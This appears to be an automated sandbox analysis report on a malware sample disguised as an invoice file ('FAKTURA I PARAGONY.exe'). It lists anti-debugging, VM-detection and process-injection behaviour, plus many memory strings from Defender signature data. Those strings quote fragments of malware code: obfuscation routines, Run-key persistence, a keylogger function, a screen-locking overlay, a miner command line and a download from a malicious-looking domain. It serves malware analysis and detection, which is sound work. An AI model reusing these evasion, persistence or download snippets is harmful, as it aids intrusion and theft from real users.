Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.xml.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmp	Binary or memory string: %s%s\%s.exe%s%sVMwareVMware
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	Binary or memory string: (AntiVirtualPCAntiVirtualBoxAntiVmWare]
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	Binary or memory string: Ven_VMware_
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	Binary or memory string: VmWareMachine
Source: wevtutil.exe, 00000028.00000002.6525075246.000001B1648BF000.00000004.00000020.sdmp	Binary or memory string: Microsoft-Windows-Hyper-V-VID
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	Binary or memory string: +system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: JE%Public%\Documents\Hyper-V\Virtual Hard Disks\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: %SystemDrive%\ProgramData\Microsoft\Windows\Hyper-V\Snapshots\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	Binary or memory string: 2-*.log.\|!\Veeam.One.Collector.VMware.Host.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: D?%ProgramData%\Microsoft\Windows\Hyper-V\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	Binary or memory string: vmtoolsd
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	Binary or memory string: *.\|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	Binary or memory string: HSTR:Detects_VirtualPC_VMWare
Source: MpSigStub.exe, 00000023.00000003.6243259523.0000028BC815A000.00000004.00000001.sdmp	Binary or memory string: pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .VMRS.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	Binary or memory string: VboxService.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.txt.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: pUnix file descriptiontargetjob\\vmware-host:Y DomainBigSpace resultiitem]
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: 83*\|%systemroot%\System32\Vmsp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	Binary or memory string: virtual hd
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2628814510.0000000002AE0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
Source: MpSigStub.exe, 00000023.00000003.6327210965.0000028BD7C8F000.00000004.00000001.sdmp	Binary or memory string: =mQ:#LowFiDetectsVmWareU
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: qemu-ga.exe
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vboxtray.exe")and$
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	Binary or memory string: vmware svga ii
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	Binary or memory string: ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp	Binary or memory string: VMWARE": IsVirtualPCPresent
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmcompute.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: .vmgs.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp	Binary or memory string: IsVmWare]
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-armel.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: *\|%systemroot%\System32\Vmsp.exe\|Microsoft-Hyper-V
Source: RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: MpSigStub.exe, 00000023.00000003.6227003671.0000028BC70EC000.00000004.00000001.sdmp	Binary or memory string: 0123456789ABCDEF0123456789abcdef\Device\\SystemRootcoroutinenewproxyLua 5.1_VERSIONpairsipairs__modekv_Gcreateresumerunningstatuswrapyieldpea_epscn_islastpea_epcallnextpea_secmissizepea_epatstartlastsectpea_entrybyte60pea_entrybyte90pea_epiniatpea_usesuninitializedregspea_prefetchtrickspea_issuspiciouspea_isgenericpea_isreportedpea_aggressiveimportpea_deep_analysispea_enable_binlibpea_enable_lshashpea_many_importspea_self_modifying_codepea_track_direct_importspea_detects_vmpea_detects_vmwarepea_detects_virtualpcpea_is_delphipea_is_processpea_uses_single_steppingpea_uses_bound_exceptionspea_uses_div_by_zeropea_uses_int_overflowpea_uses_invalid_opcodespea_uses_unusual_breakpointpea_checks_if_debugged_documentedpea_disable_io_redirectionpea_suspicious_rebasepea_disable_drop_mz_onlypea_suspicious_stack_sizepea_suspicious_stack_geometrypea_suspicious_subsystempea_suspicious_timestamppea_suspicious_valignpea_suspicious_section_fsizepea_suspicious_section_namepea_suspicious_section_characteristicspea_aggressive_trim_wspea_16bitmachinepea_system_filepea_byte_reversed_hipea_suspicious_number_of_dirspea_force_unpackingpea_extended_pestaticpea_small_data_directory_countpea_multiple_relocs_same_locationpea_relocs_but_no_relocs_flagpea_suspicious_imagebasepea_no_section_tablepea_no_sectionspea_many_sectionspea_suspicious_image_sizepea_bound_imports_inside_imagepea_delay_load_imports_inside_imagepea_entrypoint_in_import_tablepea_entrypoint_in_headerpea_import_via_tlspea_epsec_not_executablepea_othermachine_imagepea_checks_teb_lasterrorpea_disable_vmprotectpea_checks_teb_laststatuspea_disable_thread_apicall_limitpea_deep_apicall_limitpea_dynmem_uses_div_by_zeropea_dynmem_uses_int_overflowpea_dynmem_uses_bound_exceptionspea_dynmem_uses_privinstrpea_dynmem_uses_breakpointspea_dynmem_uses_single_steppingpea_dynmem_uses_invalid_opcodespea_dynmem_uses_unusual_breakpointpea_dynmem_detects_vmpea_dynmem_detects_vmwarepea_dynmem_detects_virtualpcpea_dynmem_checks_if_debugged_docpea_dynmem_checks_if_debugged_undocpea_dynmem_kernel_scanpea_dynmem_self_modifying_codepea_dt_continue_after_unpackingpea_dt_continue_after_unpacking_damagedpea_loop_jmp_chainpea_droppedpea_dynmem_reads_vdll_codepea_verbose_vdll_readspea_scan_internal_datapea_isvbpcodepea_ARM_legacypea_ARM_big_endianpea_ARM_unpredictablepea_isappcontainerpea_checks_ntglobalflagpea_dynmem_checks_ntglobalflagpea_dynmem_checks_processheappea_dt_error_too_many_prefixespea_dt_error_too_many_operandspea_dt_error_bb_limitpea_executes_from_last_sectionpea_executes_from_resourcespea_memory_patchedpea_uses_sysenterpea_suspicious_resource_directory_sizepea_suspicious_import_directory_sizepea_invalid_ilt_entrypea_dmg_machinepea_dmg_filealignmentpea_dmg_pointertorawdatapea_dmg_virtualaddresspea_dmg_truncatedpea_dmg_special_sectionpea_dmg_relocationspea_dmg_overlapping_sectionspea_dmg_optional_magicpea_dmg_sizeofheaderspea_dmg_imagebasepea_dmg_imagesizepea_dmg_unsupportedpea_dmg_importspea_dmg_invaliddatapea_dmg_decompresspea_
Source: FAKTURA I PARAGONY.exe, 00000000.00000002.2630075572.0000000004419000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7235089087.0000000002DF9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.toc.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: %Public%\Documents\Hyper-V\Virtual Hard Disks\.\|\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	Binary or memory string: http://pubs.vmware.com
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	Binary or memory string: "vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp	Binary or memory string: SCSIDISKxxvmboxxxharddiskVMware
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	Binary or memory string: +ifprocessexists("vmwaretray.exe")thenexit
Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmp	Binary or memory string: VirtualMachineDetector
Source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp	Binary or memory string: ,ifprocessexists("vboxservice.exe")thenexit
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: % *.txt.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	Binary or memory string: ".VmDetector.VirtualMachineDetector
Source: RegAsm.exe, 0000000A.00000002.7228491604.0000000001518000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW(
Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp	Binary or memory string: ifstringregexp($oobjectitem.name,"(?i)virtualbox\|vmware\|virtualpc\|sandbox\|333333\|home-off-d5f0ac\|microsof-2c393f\|123\|vwinxp-maltest")thenreturn1
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	Binary or memory string: 3svmcibex9
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	Binary or memory string: VMware Physical Disk Helper Service
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: &!*.toc.\|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp	Binary or memory string: __tbt_isVirtualMachine
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	Binary or memory string: VBoxService.exe
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	Binary or memory string: VMWARETRAY.EXEx
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.bin.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.rom.\|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6285070883.0000028BD693A000.00000004.00000001.sdmp	Binary or memory string: w!#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	Binary or memory string: =8*.BIN.\|%systemroot%\System32\Vmwp.exe\|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp	Binary or memory string: p!#RANSMATTR:PeLodDetVmWarepea_isexe&(pea_dt_error_heur_exit_criteria\|pea_dt_error_heur_API_limit\|pea_dt_error_bb_limit)&pea_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmp	Binary or memory string: "SOFTWARE\VMware, Inc.\VMware Tools
Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp	Binary or memory string: KF*.\|!%ProgramFiles(x86)%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	Binary or memory string: *.img.\|!\qemu-system-armel.exe

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe

System information queried: ModuleInformation

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\5F092BAC-4701-4818-8EB0-1B8D5E2340F4\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-51041e98.exe	File opened: C:\Windows\SERVIC~1\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process token adjusted: Debug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 10_2_01046958 KiUserExceptionDispatcher,LdrInitializeThunk,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\FAKTURA I PARAGONY.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1100000

Source: unknown

Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\03B8EEFF-063F-7FBE-74AE-B9DD32097DDC.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'

Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: pwinmgmts:\\localhost\root\securitycenter
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: <select * from antivirusproduct
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/predator.ra2!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: = stringreplace ( "
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: " , "n" , "mi" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: chrw ( bitxor ( asc (
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: = stringreverse ( "utmbjghxrnjxmtb" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojandropper:win64/miner.rw!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: xdi_destroykey
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: xdi_shutdown
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: xdi_decryptdata
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: miner.kek.gay:443 --cpu-no-yield --asm=auto --cpu-memory-pool=-1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:win32/covitse.pi!msr
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: fileinstall ( "c:\users\fud\desktop\11111111\corona.exe" , @appdatadir & "\z11062600\corona.exe" , 1 )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: shellexecute ( @appdatadir & "\z11062600\corona.exe" , "" , @appdatadir & "\z11062600" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:allowlist:injector.autoit.mx
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: #autoit3wrapper_res_field=companyname\|genesis venture investment co., ltd.
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: wisest<wisest@vip.qq.com>
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:virtool:win32/autinject.g!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $xor = bitxor ( $xor , $len + $ii )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: rtlupd64
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: execute ( "@appdatadir" ) & "\winlogons"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: \windows\microsoft.net\framework\v2.0.50727\regasm.exe
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: startup ( "winlogons.exe" , "winlogons" , "+r" , "" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#trojan:win32/autoinjec.sa!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: l_imagesearcharea ( @appdatadir & "\microsoft\1\che.bmp
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: lrun ( @tempdir & "scratch.bat" , @tempdir , @sw_hide )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/autoitinject.s1
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: enativ.com
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: regwrite ( "hkey_local_machine\software\microsoft\windows\currentversion\runonce
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: \enativ\4xnav12p.txt
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: = "http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#hstr:win32/predator.ar_0109!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: global $sdeouljcvthbiisnlmbthiecg = execute
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: stringreplace ( "skxpyvmtnwvrovjagkuhnqvobgbtrkxpyvmtnwvrovjagkuhnqvobgbinkxpyv
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: vobgbnkxpyvmtnwvrovjagkuhnqvobgb" , "kxpyvmtnwvrovjagkuhnqvobgb" , "" ) )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: " & ".exe"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: = stringsplit ( tcuuq (
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alfper:clearlock!autoit
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: $overlay = guicreate ( "clearlock" , @desktopwidth , @desktopheight ,
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: _blockinputex ( 3 , "[:alpha:]\|[:number:]\|{enter}\|{backspace}
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:hstr:trojanspy:win32/keylogger.bad!bit
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: \\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: nlogfiles-" & $date & "-" & $pwd & ".htm
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: >func _logkeypress ( $what2log )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/autoitinject.aa!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: dreturn execute ( "stringtobinary($
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: lexecute ( " bitxor($xxxxx, $i, $xx)" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: d= execute ( "mod($xxxxxxx, 256)" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: := execute ( "dllstructcreate(
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/cryptedautoit.sq!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: &while wingetprocess
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: if winclose =
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: return shellexecute ( @workingdir & chr ( 92 ) & $
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: & chr ( 92 ) & $
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ] = [ "
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0.exe" , "
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: `.exe" ]
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:hstr:autoit_rc4encodefunc
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 0f84dc000000b90001000088c82c0188840deffeffffe2f38365f4008365fc00817dfc00010000
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: 7d478b45fc31d2f775f0920345100fb6008b4dfc0fb68c0df0feffff01c80345f425ff000000
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: return shellexecute ( $sfilepath , "" , @workingdir , "print" , $ishow = default @sw_hide $ishow )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: dllcall ( "shell32.dll" , "ulong_ptr" , "shellexecutew" , "hwnd" , $hparent , $stypeofverb , $sverb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: dllcall ( "shell32.dll" , "int" , "shfileoperationw"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: "performing backup only"
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: runwait ( @comspec & " /c "
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#alf:trojan:win32/racealer.pa!mtb
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: inetget ( "
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: ://professorlog.xyz/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: .zip" , "
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: = objcreate ( "shell.application" )
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: run ( "c:\users\public\run
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	Binary or memory string: !#tel:trojan:win32/injectorautoit.sq!mtb
